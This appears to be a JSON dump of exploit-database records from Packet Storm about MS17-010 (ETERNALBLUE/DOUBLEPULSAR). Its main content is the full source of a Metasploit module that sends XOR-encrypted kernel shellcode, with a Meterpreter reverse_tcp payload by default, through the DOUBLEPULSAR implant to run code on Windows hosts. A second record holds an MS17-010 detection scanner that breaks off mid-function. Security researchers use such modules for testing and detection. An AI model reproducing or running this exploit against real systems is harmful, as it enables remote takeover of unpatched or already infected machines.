["MMPC:F3E0CD42C341A30C758CB85AD9F6D052", "MMPC:C211C70545FBDF88C2F99362DC4608A8", "MMPC:89789F73D15A0B331512F90F7E692851", "MMPC:F4F919BF0CF7F97FD15CFA500398C7D9", "MMPC:FECB9309EE6D84976C56C12C05F1CD02"]}, {"type": "canvas", "idList": ["ETERNALBLUE", "MS17_010"]}, {"type": "thn", "idList": ["THN:C50AC2400E56ED88DBA7FC6DAC8360A8", "THN:2E043D9BAC04DEE81005124DD54A31E2", "THN:18A54BDD63D7DC2B3284D326E6510150", "THN:FF56343C15BACA1C1CE83A105EFD7F77", "THN:F12E2167FDA829ED32C7A16A83B048BF"]}, {"type": "qualysblog", "idList": ["QUALYSBLOG:CD2337322AF45A03293696D535E4CBF8", "QUALYSBLOG:B891CB6093D217510DB7327088AE7FB2"]}, {"type": "mscve", "idList": ["MS:CVE-2017-0143", "MS:CVE-2017-0145", "MS:CVE-2017-0148"]}, {"type": "myhack58", "idList": ["MYHACK58:62201786371"]}, {"type": "talosblog", "idList": ["TALOSBLOG:E2BCC6AEFE1A7A25F49757116346A7A6"]}, {"type": "saint", "idList": ["SAINT:DAEC4BA69103823E03C8F3C832C5B41D", "SAINT:BD676E3751A4D110EAA275BF92CA7E46"]}, {"type": "carbonblack", "idList": ["CARBONBLACK:6730D6EB8DF875C002A93DBC78C80B9D"]}, {"type": "nmap", "idList": ["NMAP:SMB-VULN-MS17-010.NSE"]}, {"type": "malwarebytes", "idList": ["MALWAREBYTES:2AA5391DE4E1CAB582414AAD58B623CC"]}], "modified": "2020-02-06T14:50:28", "rev": 2}, "score": {"value": 8.6, "vector": "NONE", "modified": "2020-02-06T14:50:28", "rev": 2}}, "objectVersion": "1.5", "sourceHref": "https://packetstormsecurity.com/files/download/156196/smb_doublepulsar_rce.rb.txt", "sourceData": "`## \n# This module requires Metasploit: https://metasploit.com/download \n# Current source: https://github.com/rapid7/metasploit-framework \n## \n \nclass MetasploitModule < Msf::Exploit::Remote \n \nRank = GreatRanking \n \ninclude Msf::Exploit::Remote::SMB::Client \ninclude Msf::Module::Deprecated \n \nmoved_from 'exploit/windows/smb/doublepulsar_rce' \n \nMAX_SHELLCODE_SIZE = 4096 \n \ndef initialize(info = {}) \nsuper(update_info(info, \n'Name' => 'SMB DOUBLEPULSAR Remote Code Execution', \n'Description' => %q{ \nThis module executes a Metasploit payload against the Equation Group's \nDOUBLEPULSAR implant for SMB as popularly deployed by ETERNALBLUE. \n \nWhile this module primarily performs code execution against the implant, \nthe \"Neutralize implant\" target allows you to disable the implant. \n}, \n'Author' => [ \n'Equation Group', # DOUBLEPULSAR implant \n'Shadow Brokers', # Equation Group dump \n'zerosum0x0', # DOPU analysis and detection \n'Luke Jennings', # DOPU analysis and detection \n'wvu', # Metasploit module and arch detection \n'Jacob Robles' # Metasploit module and RCE help \n], \n'References' => [ \n['MSB', 'MS17-010'], \n['CVE', '2017-0143'], \n['CVE', '2017-0144'], \n['CVE', '2017-0145'], \n['CVE', '2017-0146'], \n['CVE', '2017-0147'], \n['CVE', '2017-0148'], \n['URL', 'https://zerosum0x0.blogspot.com/2017/04/doublepulsar-initial-smb-backdoor-ring.html'], \n['URL', 'https://countercept.com/blog/analyzing-the-doublepulsar-kernel-dll-injection-technique/'], \n['URL', 'https://www.countercept.com/blog/doublepulsar-usermode-analysis-generic-reflective-dll-loader/'], \n['URL', 'https://github.com/countercept/doublepulsar-detection-script'], \n['URL', 'https://github.com/countercept/doublepulsar-c2-traffic-decryptor'], \n['URL', 'https://gist.github.com/msuiche/50a36710ee59709d8c76fa50fc987be1'] \n], \n'DisclosureDate' => '2017-04-14', # Shadow Brokers leak \n'License' => MSF_LICENSE, \n'Platform' => 'win', \n'Arch' => ARCH_X64, \n'Privileged' => true, \n'Payload' => { \n'Space' => MAX_SHELLCODE_SIZE - kernel_shellcode_size, \n'DisableNops' => true \n}, \n'Targets' => [ \n['Execute payload (x64)', \n'DefaultOptions' => { \n'EXITFUNC' => 'thread', \n'PAYLOAD' => 'windows/x64/meterpreter/reverse_tcp' \n} \n], \n['Neutralize implant', \n'DefaultOptions' => { \n'PAYLOAD' => nil # XXX: \"Unset\" generic payload \n} \n] \n], \n'DefaultTarget' => 0, \n'Notes' => { \n'AKA' => ['DOUBLEPULSAR'], \n'RelatedModules' => [ \n'auxiliary/scanner/smb/smb_ms17_010', \n'exploit/windows/smb/ms17_010_eternalblue' \n], \n'Stability' => [CRASH_OS_DOWN], \n'Reliability' => [REPEATABLE_SESSION] \n} \n)) \n \nregister_advanced_options([ \nOptBool.new('DefangedMode', [true, 'Run in defanged mode', true]), \nOptString.new('ProcessName', [true, 'Process to inject payload into', 'spoolsv.exe']) \n]) \nend \n \nOPCODES = { \nping: 0x23, \nexec: 0xc8, \nkill: 0x77 \n}.freeze \n \nSTATUS_CODES = { \nnot_detected: 0x00, \nsuccess: 0x10, \ninvalid_params: 0x20, \nalloc_failure: 0x30 \n}.freeze \n \ndef calculate_doublepulsar_status(m1, m2) \nSTATUS_CODES.key(m2.to_i - m1.to_i) \nend \n \n# algorithm to calculate the XOR Key for DoublePulsar knocks \ndef calculate_doublepulsar_xor_key(s) \nx = (2 * s ^ (((s & 0xff00 | (s << 16)) << 8) | (((s >> 16) | s & 0xff0000) >> 8))) \nx & 0xffffffff # this line was added just to truncate to 32 bits \nend \n \n# The arch is adjacent to the XOR key in the SMB signature \ndef calculate_doublepulsar_arch(s) \ns == 0 ? ARCH_X86 : ARCH_X64 \nend \n \ndef generate_doublepulsar_timeout(op) \nk = SecureRandom.random_bytes(4).unpack1('V') \n0xff & (op - ((k & 0xffff00) >> 16) - (0xffff & (k & 0xff00) >> 8)) | k & 0xffff00 \nend \n \ndef generate_doublepulsar_param(op, body) \ncase OPCODES.key(op) \nwhen :ping, :kill \n\"\\x00\" * 12 \nwhen :exec \nRex::Text.xor([@xor_key].pack('V'), [body.length, body.length, 0].pack('V*')) \nend \nend \n \ndef check \nipc_share = \"\\\\\\\\#{rhost}\\\\IPC$\" \n \n@tree_id = do_smb_setup_tree(ipc_share) \nvprint_good(\"Connected to #{ipc_share} with TID = #{@tree_id}\") \nvprint_status(\"Target OS is #{smb_peer_os}\") \n \nprint_status('Sending ping to DOUBLEPULSAR') \ncode, signature1, signature2 = do_smb_doublepulsar_pkt \nmsg = 'Host is likely INFECTED with DoublePulsar!' \n \ncase calculate_doublepulsar_status(@multiplex_id, code) \nwhen :success \n@xor_key = calculate_doublepulsar_xor_key(signature1) \n@arch = calculate_doublepulsar_arch(signature2) \n \narch_str = \ncase @arch \nwhen ARCH_X86 \n'x86 (32-bit)' \nwhen ARCH_X64 \n'x64 (64-bit)' \nend \n \nprint_warning(\"#{msg} - Arch: #{arch_str}, XOR Key: 0x#{@xor_key.to_s(16).upcase}\") \nCheckCode::Vulnerable \nwhen :not_detected \nprint_error('DOUBLEPULSAR not detected or disabled') \nCheckCode::Safe \nelse \nprint_error('An unknown error occurred') \nCheckCode::Unknown \nend \nend \n \ndef exploit \nif datastore['DefangedMode'] \nwarning = <<~EOF \n \n \nAre you SURE you want to execute code against a nation-state implant? \nYou MAY contaminate forensic evidence if there is an investigation. \n \nDisable the DefangedMode option if you have authorization to proceed. \nEOF \n \nfail_with(Failure::BadConfig, warning) \nend \n \n# No ForceExploit because @tree_id and @xor_key are required \nunless check == CheckCode::Vulnerable \nfail_with(Failure::NotVulnerable, 'Unable to proceed without DOUBLEPULSAR') \nend \n \ncase target.name \nwhen 'Execute payload (x64)' \nunless @xor_key \nfail_with(Failure::NotFound, 'XOR key not found') \nend \n \nif @arch == ARCH_X86 \nfail_with(Failure::NoTarget, 'x86 is not a supported target') \nend \n \nprint_status(\"Generating kernel shellcode with #{datastore['PAYLOAD']}\") \nshellcode = make_kernel_user_payload(payload.encoded, datastore['ProcessName']) \nshellcode << rand_text(MAX_SHELLCODE_SIZE - shellcode.length) \nvprint_status(\"Total shellcode length: #{shellcode.length} bytes\") \n \nprint_status(\"Encrypting shellcode with XOR key 0x#{@xor_key.to_s(16).upcase}\") \nxor_shellcode = Rex::Text.xor([@xor_key].pack('V'), shellcode) \n \nprint_status('Sending shellcode to DOUBLEPULSAR') \ncode, _signature1, _signature2 = do_smb_doublepulsar_pkt(OPCODES[:exec], xor_shellcode) \nwhen 'Neutralize implant' \nreturn neutralize_implant \nend \n \ncase calculate_doublepulsar_status(@multiplex_id, code) \nwhen :success \nprint_good('Payload execution successful') \nwhen :invalid_params \nfail_with(Failure::BadConfig, 'Invalid parameters were specified') \nwhen :alloc_failure \nfail_with(Failure::PayloadFailed, 'An allocation failure occurred') \nelse \nfail_with(Failure::Unknown, 'An unknown error occurred') \nend \nensure \ndisconnect \nend \n \ndef neutralize_implant \nprint_status('Neutralizing DOUBLEPULSAR') \ncode, _signature1, _signature2 = do_smb_doublepulsar_pkt(OPCODES[:kill]) \n \ncase calculate_doublepulsar_status(@multiplex_id, code) \nwhen :success \nprint_good('Implant neutralization successful') \nelse \nfail_with(Failure::Unknown, 'An unknown error occurred') \nend \nend \n \ndef do_smb_setup_tree(ipc_share) \nconnect \n \n# logon as user \\ \nsimple.login(datastore['SMBName'], datastore['SMBUser'], datastore['SMBPass'], datastore['SMBDomain']) \n \n# connect to IPC$ \nsimple.connect(ipc_share) \n \n# return tree \nsimple.shares[ipc_share] \nend \n \ndef do_smb_doublepulsar_pkt(opcode = OPCODES[:ping], body = nil) \n# make doublepulsar knock \npkt = make_smb_trans2_doublepulsar(opcode, body) \n \nsock.put(pkt) \nbytes = sock.get_once \n \nreturn unless bytes \n \n# convert packet to response struct \npkt = Rex::Proto::SMB::Constants::SMB_TRANS_RES_HDR_PKT.make_struct \npkt.from_s(bytes[4..-1]) \n \nreturn pkt['SMB'].v['MultiplexID'], pkt['SMB'].v['Signature1'], pkt['SMB'].v['Signature2'] \nend \n \ndef make_smb_trans2_doublepulsar(opcode, body) \nsetup_count = 1 \nsetup_data = [0x000e].pack('v') \n \nparam = generate_doublepulsar_param(opcode, body) \ndata = param + body.to_s \n \npkt = Rex::Proto::SMB::Constants::SMB_TRANS2_PKT.make_struct \nsimple.client.smb_defaults(pkt['Payload']['SMB']) \n \nbase_offset = pkt.to_s.length + (setup_count * 2) - 4 \nparam_offset = base_offset \ndata_offset = param_offset + param.length \n \npkt['Payload']['SMB'].v['Command'] = CONST::SMB_COM_TRANSACTION2 \npkt['Payload']['SMB'].v['Flags1'] = 0x18 \npkt['Payload']['SMB'].v['Flags2'] = 0xc007 \n \n@multiplex_id = rand(0xffff) \n \npkt['Payload']['SMB'].v['WordCount'] = 14 + setup_count \npkt['Payload']['SMB'].v['TreeID'] = @tree_id \npkt['Payload']['SMB'].v['MultiplexID'] = @multiplex_id \n \npkt['Payload'].v['ParamCountTotal'] = param.length \npkt['Payload'].v['DataCountTotal'] = body.to_s.length \npkt['Payload'].v['ParamCountMax'] = 1 \npkt['Payload'].v['DataCountMax'] = 0 \npkt['Payload'].v['ParamCount'] = param.length \npkt['Payload'].v['ParamOffset'] = param_offset \npkt['Payload'].v['DataCount'] = body.to_s.length \npkt['Payload'].v['DataOffset'] = data_offset \npkt['Payload'].v['SetupCount'] = setup_count \npkt['Payload'].v['SetupData'] = setup_data \npkt['Payload'].v['Timeout'] = generate_doublepulsar_timeout(opcode) \npkt['Payload'].v['Payload'] = data \n \npkt.to_s \nend \n \n# ring3 = user mode encoded payload \n# proc_name = process to inject APC into \ndef make_kernel_user_payload(ring3, proc_name) \nsc = make_kernel_shellcode(proc_name) \n \nsc << [ring3.length].pack('S<') \nsc << ring3 \n \nsc \nend \n \ndef generate_process_hash(process) \n# x64_calc_hash from external/source/shellcode/windows/multi_arch_kernel_queue_apc.asm \nproc_hash = 0 \nprocess << \"\\x00\" \n \nprocess.each_byte do |c| \nproc_hash = ror(proc_hash, 13) \nproc_hash += c \nend \n \n[proc_hash].pack('l<') \nend \n \ndef ror(dword, bits) \n(dword >> bits | dword << (32 - bits)) & 0xFFFFFFFF \nend \n \ndef make_kernel_shellcode(proc_name) \n# see: external/source/shellcode/windows/multi_arch_kernel_queue_apc.asm \n# Length: 780 bytes \n\"\\x31\\xc9\\x41\\xe2\\x01\\xc3\\x56\\x41\\x57\\x41\\x56\\x41\\x55\\x41\\x54\\x53\" \\ \n\"\\x55\\x48\\x89\\xe5\\x66\\x83\\xe4\\xf0\\x48\\x83\\xec\\x20\\x4c\\x8d\\x35\\xe3\" \\ \n\"\\xff\\xff\\xff\\x65\\x4c\\x8b\\x3c\\x25\\x38\\x00\\x00\\x00\\x4d\\x8b\\x7f\\x04\" \\ \n\"\\x49\\xc1\\xef\\x0c\\x49\\xc1\\xe7\\x0c\\x49\\x81\\xef\\x00\\x10\\x00\\x00\\x49\" \\ \n\"\\x8b\\x37\\x66\\x81\\xfe\\x4d\\x5a\\x75\\xef\\x41\\xbb\\x5c\\x72\\x11\\x62\\xe8\" \\ \n\"\\x18\\x02\\x00\\x00\\x48\\x89\\xc6\\x48\\x81\\xc6\\x08\\x03\\x00\\x00\\x41\\xbb\" \\ \n\"\\x7a\\xba\\xa3\\x30\\xe8\\x03\\x02\\x00\\x00\\x48\\x89\\xf1\\x48\\x39\\xf0\\x77\" \\ \n\"\\x11\\x48\\x8d\\x90\\x00\\x05\\x00\\x00\\x48\\x39\\xf2\\x72\\x05\\x48\\x29\\xc6\" \\ \n\"\\xeb\\x08\\x48\\x8b\\x36\\x48\\x39\\xce\\x75\\xe2\\x49\\x89\\xf4\\x31\\xdb\\x89\" \\ \n\"\\xd9\\x83\\xc1\\x04\\x81\\xf9\\x00\\x00\\x01\\x00\\x0f\\x8d\\x66\\x01\\x00\\x00\" \\ \n\"\\x4c\\x89\\xf2\\x89\\xcb\\x41\\xbb\\x66\\x55\\xa2\\x4b\\xe8\\xbc\\x01\\x00\\x00\" \\ \n\"\\x85\\xc0\\x75\\xdb\\x49\\x8b\\x0e\\x41\\xbb\\xa3\\x6f\\x72\\x2d\\xe8\\xaa\\x01\" \\ \n\"\\x00\\x00\\x48\\x89\\xc6\\xe8\\x50\\x01\\x00\\x00\\x41\\x81\\xf9\" + \ngenerate_process_hash(proc_name.upcase) + \n\"\\x75\\xbc\\x49\\x8b\\x1e\\x4d\\x8d\\x6e\\x10\\x4c\\x89\\xea\\x48\\x89\\xd9\" \\ \n\"\\x41\\xbb\\xe5\\x24\\x11\\xdc\\xe8\\x81\\x01\\x00\\x00\\x6a\\x40\\x68\\x00\\x10\" \\ \n\"\\x00\\x00\\x4d\\x8d\\x4e\\x08\\x49\\xc7\\x01\\x00\\x10\\x00\\x00\\x4d\\x31\\xc0\" \\ \n\"\\x4c\\x89\\xf2\\x31\\xc9\\x48\\x89\\x0a\\x48\\xf7\\xd1\\x41\\xbb\\x4b\\xca\\x0a\" \\ \n\"\\xee\\x48\\x83\\xec\\x20\\xe8\\x52\\x01\\x00\\x00\\x85\\xc0\\x0f\\x85\\xc8\\x00\" \\ \n\"\\x00\\x00\\x49\\x8b\\x3e\\x48\\x8d\\x35\\xe9\\x00\\x00\\x00\\x31\\xc9\\x66\\x03\" \\ \n\"\\x0d\\xd7\\x01\\x00\\x00\\x66\\x81\\xc1\\xf9\\x00\\xf3\\xa4\\x48\\x89\\xde\\x48\" \\ \n\"\\x81\\xc6\\x08\\x03\\x00\\x00\\x48\\x89\\xf1\\x48\\x8b\\x11\\x4c\\x29\\xe2\\x51\" \\ \n\"\\x52\\x48\\x89\\xd1\\x48\\x83\\xec\\x20\\x41\\xbb\\x26\\x40\\x36\\x9d\\xe8\\x09\" \\ \n\"\\x01\\x00\\x00\\x48\\x83\\xc4\\x20\\x5a\\x59\\x48\\x85\\xc0\\x74\\x18\\x48\\x8b\" \\ \n\"\\x80\\xc8\\x02\\x00\\x00\\x48\\x85\\xc0\\x74\\x0c\\x48\\x83\\xc2\\x4c\\x8b\\x02\" \\ \n\"\\x0f\\xba\\xe0\\x05\\x72\\x05\\x48\\x8b\\x09\\xeb\\xbe\\x48\\x83\\xea\\x4c\\x49\" \\ \n\"\\x89\\xd4\\x31\\xd2\\x80\\xc2\\x90\\x31\\xc9\\x41\\xbb\\x26\\xac\\x50\\x91\\xe8\" \\ \n\"\\xc8\\x00\\x00\\x00\\x48\\x89\\xc1\\x4c\\x8d\\x89\\x80\\x00\\x00\\x00\\x41\\xc6\" \\ \n\"\\x01\\xc3\\x4c\\x89\\xe2\\x49\\x89\\xc4\\x4d\\x31\\xc0\\x41\\x50\\x6a\\x01\\x49\" \\ \n\"\\x8b\\x06\\x50\\x41\\x50\\x48\\x83\\xec\\x20\\x41\\xbb\\xac\\xce\\x55\\x4b\\xe8\" \\ \n\"\\x98\\x00\\x00\\x00\\x31\\xd2\\x52\\x52\\x41\\x58\\x41\\x59\\x4c\\x89\\xe1\\x41\" \\ \n\"\\xbb\\x18\\x38\\x09\\x9e\\xe8\\x82\\x00\\x00\\x00\\x4c\\x89\\xe9\\x41\\xbb\\x22\" \\ \n\"\\xb7\\xb3\\x7d\\xe8\\x74\\x00\\x00\\x00\\x48\\x89\\xd9\\x41\\xbb\\x0d\\xe2\\x4d\" \\ \n\"\\x85\\xe8\\x66\\x00\\x00\\x00\\x48\\x89\\xec\\x5d\\x5b\\x41\\x5c\\x41\\x5d\\x41\" \\ \n\"\\x5e\\x41\\x5f\\x5e\\xc3\\xe9\\xb5\\x00\\x00\\x00\\x4d\\x31\\xc9\\x31\\xc0\\xac\" \\ \n\"\\x41\\xc1\\xc9\\x0d\\x3c\\x61\\x7c\\x02\\x2c\\x20\\x41\\x01\\xc1\\x38\\xe0\\x75\" \\ \n\"\\xec\\xc3\\x31\\xd2\\x65\\x48\\x8b\\x52\\x60\\x48\\x8b\\x52\\x18\\x48\\x8b\\x52\" \\ \n\"\\x20\\x48\\x8b\\x12\\x48\\x8b\\x72\\x50\\x48\\x0f\\xb7\\x4a\\x4a\\x45\\x31\\xc9\" \\ \n\"\\x31\\xc0\\xac\\x3c\\x61\\x7c\\x02\\x2c\\x20\\x41\\xc1\\xc9\\x0d\\x41\\x01\\xc1\" \\ \n\"\\xe2\\xee\\x45\\x39\\xd9\\x75\\xda\\x4c\\x8b\\x7a\\x20\\xc3\\x4c\\x89\\xf8\\x41\" \\ \n\"\\x51\\x41\\x50\\x52\\x51\\x56\\x48\\x89\\xc2\\x8b\\x42\\x3c\\x48\\x01\\xd0\\x8b\" \\ \n\"\\x80\\x88\\x00\\x00\\x00\\x48\\x01\\xd0\\x50\\x8b\\x48\\x18\\x44\\x8b\\x40\\x20\" \\ \n\"\\x49\\x01\\xd0\\x48\\xff\\xc9\\x41\\x8b\\x34\\x88\\x48\\x01\\xd6\\xe8\\x78\\xff\" \\ \n\"\\xff\\xff\\x45\\x39\\xd9\\x75\\xec\\x58\\x44\\x8b\\x40\\x24\\x49\\x01\\xd0\\x66\" \\ \n\"\\x41\\x8b\\x0c\\x48\\x44\\x8b\\x40\\x1c\\x49\\x01\\xd0\\x41\\x8b\\x04\\x88\\x48\" \\ \n\"\\x01\\xd0\\x5e\\x59\\x5a\\x41\\x58\\x41\\x59\\x41\\x5b\\x41\\x53\\xff\\xe0\\x56\" \\ \n\"\\x41\\x57\\x55\\x48\\x89\\xe5\\x48\\x83\\xec\\x20\\x41\\xbb\\xda\\x16\\xaf\\x92\" \\ \n\"\\xe8\\x4d\\xff\\xff\\xff\\x31\\xc9\\x51\\x51\\x51\\x51\\x41\\x59\\x4c\\x8d\\x05\" \\ \n\"\\x1a\\x00\\x00\\x00\\x5a\\x48\\x83\\xec\\x20\\x41\\xbb\\x46\\x45\\x1b\\x22\\xe8\" \\ \n\"\\x68\\xff\\xff\\xff\\x48\\x89\\xec\\x5d\\x41\\x5f\\x5e\\xc3\" \nend \n \ndef kernel_shellcode_size \nmake_kernel_shellcode('').length \nend \n \nend \n`\n", "_object_type": "robots.models.packetstorm.PacketstormBulletin", "_object_types": ["robots.models.packetstorm.PacketstormBulletin", "robots.models.base.Bulletin"], "immutableFields": [], "cvss2": {}, "cvss3": {}}, {"id": "PACKETSTORM:142181", "hash": "bcbbdfdd250da7f17456f3ca52987294", "type": "packetstorm", "bulletinFamily": "exploit", "title": "Microsoft Windows MS17-010 SMB Remote Code Execution", "description": "", "published": "2017-04-17T00:00:00", "modified": "2017-04-17T00:00:00", "cvss": {"vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/", "score": 9.3}, "href": "https://packetstormsecurity.com/files/142181/Microsoft-Windows-MS17-010-SMB-Remote-Code-Execution.html", "reporter": "Sean Dillon", "references": [], "cvelist": ["CVE-2017-0144", "CVE-2017-0148", "CVE-2017-0147", "CVE-2017-0146", "CVE-2017-0143", "CVE-2017-0145"], "lastseen": "2017-04-18T01:24:55", "history": [], "viewCount": 3991, "enchantments": {"score": {"value": 8.3, "vector": "NONE", "modified": "2017-04-18T01:24:55", "rev": 2}, "dependencies": {"references": [{"type": "attackerkb", "idList": ["AKB:400EDB06-73BF-4A6D-A113-643077965C7B", "AKB:B43D414F-6140-4931-BED8-4AE15FFDFAE1", "AKB:D476227F-C4B1-49E3-9947-897077E5150D"]}, {"type": "rapid7community", "idList": ["RAPID7COMMUNITY:3EEFED2F93F50D3C56A51C03A7A3513D", "RAPID7COMMUNITY:761964EB7C8E68AD2D9E6DC0095DF4C0", "RAPID7COMMUNITY:B91CF4077282454499672A7AD6FBE744", "RAPID7COMMUNITY:8B3AE9E0999C9317B6911ECE10B8A820", "RAPID7COMMUNITY:4570AAF658D82BF591A6D6AB473704B6", "RAPID7COMMUNITY:9E4E3C72C90426CECD1801D8F0006388", "RAPID7COMMUNITY:D6095B3BBE1704D4062E19C249D178EC", "RAPID7COMMUNITY:958C8DA808BCCA56E72237E0015ED607"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:156196", "PACKETSTORM:146236", "PACKETSTORM:142548", "PACKETSTORM:154690"]}, {"type": "zdt", "idList": ["1337DAY-ID-33895", "1337DAY-ID-27786", "1337DAY-ID-27752", "1337DAY-ID-33313", "1337DAY-ID-29702", "1337DAY-ID-27613"]}, {"type": "metasploit", "idList": ["MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE_WIN8", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_PSEXEC", "MSF:EXPLOIT/WINDOWS/SMB/DOUBLEPULSAR_RCE", "MSF:EXPLOIT/WINDOWS/SMB/SMB_DOUBLEPULSAR_RCE", "MSF:AUXILIARY/SCANNER/SMB/SMB_MS17_010", "MSF:ILITIES/MSFT-CVE-2017-0145/", "MSF:ILITIES/MSFT-CVE-2017-0146/", "MSF:AUXILIARY/ADMIN/SMB/MS17_010_COMMAND", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE"]}, {"type": "nessus", "idList": ["700059.PRM", "SMB_NT_MS17-010.NASL", "700099.PRM", "MS17-010.NASL"]}, {"type": "kaspersky", "idList": ["KLA10977"]}, {"type": "seebug", "idList": ["SSV:92964", "SSV:92952"]}, {"type": "exploitdb", "idList": ["EDB-ID:41891", "EDB-ID:41987", "EDB-ID:47456", "EDB-ID:43970"]}, {"type": "openvas", "idList": ["OPENVAS:1361412562310810810", "OPENVAS:1361412562310810698", "OPENVAS:1361412562310810676"]}, {"type": "f5", "idList": ["F5:K57181937"]}, {"type": "mskb", "idList": ["KB4012598", "KB4013389"]}, {"type": "huawei", "idList": ["HUAWEI-SA-20170513-01-WINDOWS"]}, {"type": "cve", "idList": ["CVE-2017-0145", "CVE-2017-0144", "CVE-2017-0148", "CVE-2017-0143", "CVE-2017-0147", "CVE-2017-0146"]}, {"type": "symantec", "idList": ["SMNTC-96706", "SMNTC-96703", "SMNTC-96705", "SMNTC-96709", "SMNTC-96704", "SMNTC-96707"]}, {"type": "checkpoint_advisories", "idList": ["CPAI-2017-0177", "CPAI-2017-0198", "CPAI-2017-0203", "CPAI-2017-0205", "CPAI-2017-0419", "CPAI-2017-0200"]}, {"type": "kitploit", "idList": ["KITPLOIT:9146046356497464176"]}, {"type": "trendmicroblog", "idList": ["TRENDMICROBLOG:F01C658432B4BB0C2F28F1E5CE666104", "TRENDMICROBLOG:657A275464AD59827A9E6C1CD1726546", "TRENDMICROBLOG:4A07139FC4D015AFBEA9BD27C01BBA37"]}, {"type": "threatpost", "idList": ["THREATPOST:046D40D1A5114EC07BBA6DB3AE27AA61", "THREATPOST:758CC5987A361EA1BB8BBFFC425334D5", "THREATPOST:F569DB7301109F1CDBCA30319EA8E2E7", "THREATPOST:D6175B132FE6B7820E744D2387FE7D5D", "THREATPOST:6520102503D39BD2183F4ECDEFA9D591"]}, {"type": "mmpc", "idList": ["MMPC:FECB9309EE6D84976C56C12C05F1CD02", "MMPC:C211C70545FBDF88C2F99362DC4608A8", "MMPC:F3E0CD42C341A30C758CB85AD9F6D052", "MMPC:F4F919BF0CF7F97FD15CFA500398C7D9", "MMPC:89789F73D15A0B331512F90F7E692851"]}, {"type": "canvas", "idList": ["MS17_010", "ETERNALBLUE"]}, {"type": "thn", "idList": ["THN:2E043D9BAC04DEE81005124DD54A31E2", "THN:18A54BDD63D7DC2B3284D326E6510150", "THN:C50AC2400E56ED88DBA7FC6DAC8360A8", "THN:F12E2167FDA829ED32C7A16A83B048BF", "THN:FF56343C15BACA1C1CE83A105EFD7F77"]}, {"type": "qualysblog", "idList": ["QUALYSBLOG:CD2337322AF45A03293696D535E4CBF8", "QUALYSBLOG:B891CB6093D217510DB7327088AE7FB2"]}, {"type": "mscve", "idList": ["MS:CVE-2017-0148", "MS:CVE-2017-0143", "MS:CVE-2017-0145"]}, {"type": "myhack58", "idList": ["MYHACK58:62201786371"]}, {"type": "talosblog", "idList": ["TALOSBLOG:E2BCC6AEFE1A7A25F49757116346A7A6"]}, {"type": "nmap", "idList": ["NMAP:SMB-VULN-MS17-010.NSE"]}, {"type": "saint", "idList": ["SAINT:DAEC4BA69103823E03C8F3C832C5B41D", "SAINT:BD676E3751A4D110EAA275BF92CA7E46"]}, {"type": "carbonblack", "idList": ["CARBONBLACK:6730D6EB8DF875C002A93DBC78C80B9D"]}, {"type": "malwarebytes", "idList": ["MALWAREBYTES:2AA5391DE4E1CAB582414AAD58B623CC"]}], "modified": "2017-04-18T01:24:55", "rev": 2}}, "objectVersion": "1.5", "sourceHref": "https://packetstormsecurity.com/files/download/142181/mswinsmb-exec.rb.txt", "sourceData": "`## \n# This module requires Metasploit: http://metasploit.com/download \n# Current source: https://github.com/rapid7/metasploit-framework \n## \n \n# auxiliary/scanner/smb/smb_ms_17_010 \n \nrequire 'msf/core' \n \nclass MetasploitModule < Msf::Auxiliary \n \ninclude Msf::Exploit::Remote::SMB::Client \ninclude Msf::Exploit::Remote::SMB::Client::Authenticated \n \ninclude Msf::Auxiliary::Scanner \ninclude Msf::Auxiliary::Report \n \ndef initialize(info = {}) \nsuper(update_info(info, \n'Name' => 'MS17-010 SMB RCE Detection', \n'Description' => %q{ \nUses information disclosure to determine if MS17-010 has been patched or not. \nSpecifically, it connects to the IPC$ tree and attempts a transaction on FID 0. \nIf the status returned is \"STATUS_INSUFF_SERVER_RESOURCES\", the machine does \nnot have the MS17-010 patch. \n \nThis module does not require valid SMB credentials in default server \nconfigurations. It can log on as the user \"\\\" and connect to IPC$. \n}, \n'Author' => [ 'Sean Dillon <sean.dillon@risksense.com>' ], \n'References' => \n[ \n[ 'CVE', '2017-0143'], \n[ 'CVE', '2017-0144'], \n[ 'CVE', '2017-0145'], \n[ 'CVE', '2017-0146'], \n[ 'CVE', '2017-0147'], \n[ 'CVE', '2017-0148'], \n[ 'MSB', 'MS17-010'], \n[ 'URL', 'https://technet.microsoft.com/en-us/library/security/ms17-010.aspx'] \n], \n'License' => MSF_LICENSE \n)) \nend \n \ndef run_host(ip) \nbegin \nstatus = do_smb_probe(ip) \n \nif status == \"STATUS_INSUFF_SERVER_RESOURCES\" \nprint_warning(\"Host is likely VULNERABLE to MS17-010!\") \nreport_vuln( \nhost: ip, \nname: self.name, \nrefs: self.references, \ninfo: 'STATUS_INSUFF_SERVER_RESOURCES for FID 0 against IPC$' \n) \nelsif status == \"STATUS_ACCESS_DENIED\" or status == \"STATUS_INVALID_HANDLE\" \n# STATUS_ACCESS_DENIED (Windows 10) and STATUS_INVALID_HANDLE (others) \nprint_good(\"Host does NOT appear vulnerable.\") \nelse \nprint_bad(\"Unable to properly detect if host is vulnerable.\") \nend \n \nrescue ::Interrupt \nprint_status(\"Exiting on interrupt.\") \nraise $! \nrescue ::Rex::Proto::SMB::Exceptions::LoginError \nprint_error(\"An SMB Login Error occurred while connecting to the IPC$ tree.\") \nrescue ::Exception => e \nvprint_error(\"#{e.class}: #{e.message}\") \nensure \ndisconnect \nend \nend \n \ndef do_smb_probe(ip) \nconnect \n \n# logon as user \\ \nsimple.login(datastore['SMBName'], datastore['SMBUser'], datastore['SMBPass'], datastore['SMBDomain']) \n \n# connect to IPC$ \nipc_share = \"\\\\\\\\#{ip}\\\\IPC$\" \nsimple.connect(ipc_share) \ntree_id = simple.shares[ipc_share] \n \nprint_status(\"Connected to #{ipc_share} with TID = #{tree_id}\") \n \n# request transaction with fid = 0 \npkt = make_smb_trans_ms17_010(tree_id) \nsock.put(pkt) \nbytes = sock.get_once \n \n# convert packet to response struct \npkt = Rex::Proto::SMB::Constants::SMB_TRANS_RES_HDR_PKT.make_struct \npkt.from_s(bytes[4..-1]) \n \n# convert error code to string \ncode = pkt['SMB'].v['ErrorClass'] \nsmberr = Rex::Proto::SMB::Exceptions::ErrorCode.new \nstatus = smberr.get_error(code) \n \nprint_status(\"Received #{status} with FID = 0\") \nstatus \nend \n \ndef make_smb_trans_ms17_010(tree_id) \n# make a raw 